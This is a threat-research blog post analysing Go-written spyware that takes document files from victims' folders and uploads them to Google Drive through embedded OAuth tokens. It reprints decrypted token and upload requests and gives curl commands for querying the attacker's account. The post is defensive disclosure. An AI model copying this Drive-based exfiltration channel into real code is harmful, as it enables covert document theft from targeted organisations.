Using cloud-based sharing sites is not a new routine for bad guys. Aside from providing free storage for their malicious files, these legitimate sites are used to evade security vendors and researchers.

We have seen malware that have taken advantage of these sites, such as DropBoxSendspace, and Evernote. We can now include Google Drive to the list of “abused” sites. We recently came across malware, detected as TSPY_DRIGO.A, that uses Google Drive as one way of siphoning information from its victims.

Access to Google Drive

Once executed, the malware will check for the following file types in certain locations to upload them into Google Drive:

  • XLSX
  • XLS
  • DOC
  • DOCX
  • PDF
  • TXT
  • PPT
  • PPTX

The locations where the malware checks for files include the Recycle Bin and the User Documents folder.

In order to upload the files to Google Drive, the client_id and client_secret were embedded on the malware, together with a refresh token. Refresh tokens are needed as part of the OAuth 2.0 protocol, which is used by Google Drive. This protocol is used by Twitter, Facebook and other sites to use their accounts to log in to a different website. Access tokens are used to have access on a Google Drive account. However, access tokens expire so refresh tokens are needed to get new access tokens.

We decrypted communication from the malware and saw activity such as requests for new tokens and uploading files.

; request for new token

POST /o/oauth2/token HTTP/1.1
Host: accounts.google.com
User-Agent: Go 1.1 package http
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

client_id={REMOVED}apps.googleusercontent.com&client_secret= {REMOVED}&grant_type=refresh_token&refresh_token={REMOVED}

;reply for new token

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 14 Oct 2014 08:08:32 GMT
Content-Disposition: attachment; filename=”sample.txt”; filename*=UTF-8”sample.txt
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alternate-Protocol: 443:quic
Transfer-Encoding: chunked

{
“access_token” : “{REMOVED}”,
“token_type” : “Bearer”,
“expires_in” : 3600
}

;upload file

POST /upload/drive/v2/files?alt=json&uploadType=multipart HTTP/1.1
Host: www.googleapis.com
User-Agent: google-api-go-client/0.5
Content-Length: 398
Authorization: OAuth {REMOVED}

Content-Type: multipart/related; boundary=e0cee80c4f3d21e18e77548a60b374408ce65bc3b76c5de1cdbe2afe7eeb
Accept-Encoding: gzip

We used this same approach in order to check the files uploaded in the Google Drive account. As of this writing, some of the files are still “active” or present in the account. We’ve also found that the file names reveal the targeted entities, which are mostly government agencies.

Below is the command line used for testing:

;Request new token
Curl –d “cliend_id={CLIENT_ID}&client_secret={SECRET_KEY}&grant_type=refresh_token&refresh_token={REFRESH_TOKEN} https://accounts.google.com/o/oauth2/token

;List files
Curl –H “Authorization: OAuth {ACCESS_TOKEN}” https://www.googleapis.com/drive/v2/files?maxresults=1

Here’s an excerpt of the log from the Google Drive account on one of the files uploaded:

{
“kind”: “drive#file”,
:
:
“title”: “{HOSTNAME} C:\\Users\\{USERNAME}\\AppData\\Roaming\\{REMOVED}長致詞{REMOVED}.doc”,
“mimeType”: “application/vnd.google-apps.document”,
:
:
},
“createdDate”: “2014-10-16T10:13:14.339Z”,
“modifiedDate”: “2014-10-16T10:13:16.286Z”,
“modifiedByMeDate”: “2014-10-16T10:13:16.286Z”,
“lastViewedByMeDate”: “2014-10-16T10:13:16.286Z”,
“markedViewedByMeDate”: “1970-01-01T00:00:00.000Z”,
:
:
}

The Other Google Connection

Use of Google Drive isn’t the only thing that connects this malware to Google. The malware was actually created using the Go programming language, commonly known as golang. This is an open source programming language that was initially developed by Google. According to Google, “the goals of the Go project were to eliminate the slowness and clumsiness of software development at Google, and thereby to make the process more productive and scalable.”

While interesting, the use of golang is not new; security researchers have seen golang-created malware as early as 2012. It would be hard to pinpoint the exact reason for using golang but some have attributed its appeal to its supposed lack of mainstream profile.

Gathering Information

Our analysis shows that this malware can only upload document-type files to Google Drive. This type of malware routine is perfect for reconnaissance—one of the earlier stages for targeted attacks. After all, one of the key aspects in a successful attack is having enough information on the target. The more information they can gather, the more vector of attack they can use on their target.

The following hashes are related to this attack:

  • 2C32674B334F10000CB63ED4BA4EE543A16D8572
  • 2D98DDF8F5128853DD33523BCBBD472B8D362705

Trend Micro secures enterprises via its Custom Defense solution that provides advanced threat protection by performing network-wide monitoring to detect zero-day malware, malicious communications, and attacker behaviors invisible to standard solutions.

We have already notified Google about this incident.

With additional insight from Ronnie Giagone, Dove Chiu, and Vico Fang.

Source: http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attacks-stealing-information-through-google-drive/